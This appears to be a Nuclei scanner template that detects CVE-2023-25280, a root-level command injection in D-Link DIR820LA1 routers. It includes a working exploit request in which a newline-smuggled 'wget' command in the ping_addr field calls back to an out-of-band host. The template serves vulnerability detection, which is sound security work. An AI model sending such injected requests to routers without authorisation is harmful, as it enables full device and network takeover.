id: CVE-2023-25280 info: name: D-Link DIR820LA1_FW105B03 'ping_addr' - OS Command Injection author: pussycat0x severity: critical description: | OS Command injection vulnerability in D-Link DIR820LA1_FW105B03 allows attackers to escalate privileges to root via a crafted payload with the ping_addr parameter to ping.ccp. impact: | Unauthenticated attackers can execute arbitrary OS commands with root privileges on the D-Link DIR820LA1 router, leading to complete device compromise and network takeover. remediation: | Upgrade to the latest firmware version from D-Link or replace the affected device with a patched model. reference: - https://github.com/migraine-sudo/D_Link_Vuln/tree/main/cmd%20Inject%20in%20pingV4Msg - https://www.dlink.com/en/security-bulletin/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-25280 cwe-id: CWE-78 epss-score: 0.98053 epss-percentile: 0.99904 cpe: cpe:2.3:o:dlink:dir820la1_firmware:105b03:*:*:*:*:*:*:* metadata: vendor: dlink product: dir820la1_firmware tags: cve,cve2023,rce,unauth,kev,dlink,vkev,vuln variables: payload: "wget http://{{interactsh-url}}" flow: http(1) && http(2) http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - "status_code == 200" - "contains(body, 'D-LINK')" condition: and internal: true - raw: - | POST /ping.ccp HTTP/1.1 Host: {{Hostname}} Accept: application/xml, text/xml, */*; q=0.01 X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded Origin: {{RootURL}} Referer: {{RootURL}}/lan.asp Cookie: hasLogin=1 ccp_act=pingV4Msg&ping_addr=%0a{{payload}}%0a matchers: - type: dsl dsl: - "contains(interactsh_protocol, 'http')" - "status_code == 200" condition: and # digest: 490a0046304402203e6e33972ec4d7a8f8b4260c92b1aceac9c1b88b409405f9e52106f9dbfc2f8d02205ef33900a67d7b6e7a6f55db386597de7c6cd30cf8094bcafcbb4211a408de1e:922c64590222798bb761d5b6d8e72950